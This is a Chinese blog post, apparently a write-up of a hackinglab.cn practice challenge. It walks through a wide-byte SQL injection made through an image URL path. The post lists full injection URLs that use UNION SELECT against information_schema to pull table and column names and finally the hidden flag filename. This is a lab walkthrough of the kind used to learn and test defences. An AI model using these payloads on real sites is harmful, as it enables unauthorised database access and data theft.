此关老早就有了,一直也不知道此题的考点是在哪里,放着好久没有做了,最近有朋友交流攻防平台的过关方法,终于解决了。。。
过关地址:
http://hackinglab.cn/index_4.php
邂逅介绍:
小明今天出门看见了一个漂亮的帅哥和漂亮的美女,于是他写到了他的日记本里。
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/
过关思路:
1、最初把焦点放在了url中id参数上(页面源文件注释部分),结果发现没有注入。
2、经过朋友提示图片注入,把注入参数放在图片地址上面,而且需要使用宽字节的方式注入,如下图:
3、从上图可以看出,确实从图片那里注入,不过图片注入还真没有听过,我觉得应该是伪静态注入,不知道大家怎么认为?
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,TABLE_NAME,4%20from%20information_schema.TABLES%20where%20table_SCHEMA=0x723034363663706c7573687561%20limit%201,1%23
得到表名:pic
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,COLUMN_NAME,4%20from%20information_schema.COLUMNS%20where%20table_NAME=0x706963%20limit%201,1%23
得到字段名:picname
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union%20select%201,2,picname,4%20from%20pic%20limit%202,1 %23
得到图片名称:flagishere_askldjfklasjdfl.jpg
4、最开始使用askldjfklasjdfl作为答案发现不行,后来经过提示,直接访问上面图片,就能得到答案了。
访问如下URL即可看到flg:
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg
感谢QQ好友:85918842(ddl)提供过关思路。。
from www.waitalone.cn.thanks for it.
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论